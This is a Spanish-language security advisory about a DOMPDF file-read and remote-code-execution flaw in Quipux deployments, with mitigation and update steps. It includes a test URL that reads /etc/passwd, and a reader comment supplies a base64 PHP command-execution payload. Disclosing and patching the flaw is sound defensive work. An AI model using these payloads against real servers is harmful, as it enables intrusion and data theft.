Falla en versiones de Quipux utilizadas por instituciones en el país.

Gracias a reporte del CSIRT EPN conocemos que implementaciones del sistema de gestión documental Quipux que se basan en los repositorios de minka son vulnerables a lectura arbitraria de archivos y RCE debido al componente DOMPDF versión 0.6.0 o inferior.

URL de minka con el componente vulnerable:
https://minka.gob.ec/subgobelectro/Quipux/blob/master/Quipux/quipux_comunidad_v4/quipux/js/dompdf/dompdf.php

En las siguientes URL se explica cómo explotar la vulnerabilidad. Por la fecha del CVE, ha estado presente desde el 2014:
https://www.exploit-db.com/exploits/33004
https://regilero.github.io/security/english/2016/12/19/security_dompdf_rce/

Para probar la vulnerabilidad en un sitio se puede usar el siguiente exploit:
http(s)://SUSITIOQUIPUX/js/dompdf/dompdf.php?input_file=/etc/passwd

Sustituya SUSITIOQUIPUX por el nombre de su sitio quipux, ej: «quipux.institucion.edu.ec» (sin comillas)

En base a conversación sostenida con CSIRT EPN sugerimos:
1- Ubicar el servicio de Quipux detrás de un WAF. Puede contactar a NOC de CEDIA para coordinar el proceso para poner el sitio de Quipux detrás del WAF
2- Actualizar dompdf a la versión 0.6.1
3- Comunicarse con la entidad responsable para conocer sobre el proceso de obtener una versión actualizada de Quipux. https://www.gobiernoelectronico.gob.ec/proceso-de-implantacion-quipux/

Sugerimos una revisión completa del sistema Quipux en vista de que pueden existir otros componentes que requieran actualización.

Cualquier duda, estamos gustosos de apoyarles

Agradecemos el informe de Edison Jiménez del CSIRT EPN https://www.csirt-epn.edu.ec/

Actualización al 20200731

De mintel nos informan que se ha realizado una actualización al Quipux en base a este reporte. La actualización está disponible en:

https://minka.gob.ec/quipux-comunitario/quipux-comunitario

Se elimina la carpeta dompdf

Realizar las siguientes acciones. los archivos modificados pueden bajarse de la rama mencionada.

reemplazar:   plantillas/CodigoBarras.php
borrar:    plantillas/GenerarDocumento.php
reemplazar:   plantillas/Sobres.php
reemplazar:   uploadFiles/cargar_doc_digitalizado_paginador.php

Agradecemos comunicación de la Dirección nacional de provisión de servicios electrónicos del Mintel

Un comentario en “Falla en versiones de Quipux utilizadas por instituciones en el país.

  • el 2020/08/07 a las 10:20 AM
    Permalink

    No solo eso, el parametro input_file nos permite ingresar codigos en base64. Por ejemplo algo como «». El siguiente exploit nos permite ejecutar comandos al servidor y a su ves tambien podriamos ejecutar un reverse shell con la possibilidad de conseguir root.

    http(s)://SUSITIOQUIPUX/js/dompdf/dompdf.php?cmd=COMANDO&input_file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

    Respuesta

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.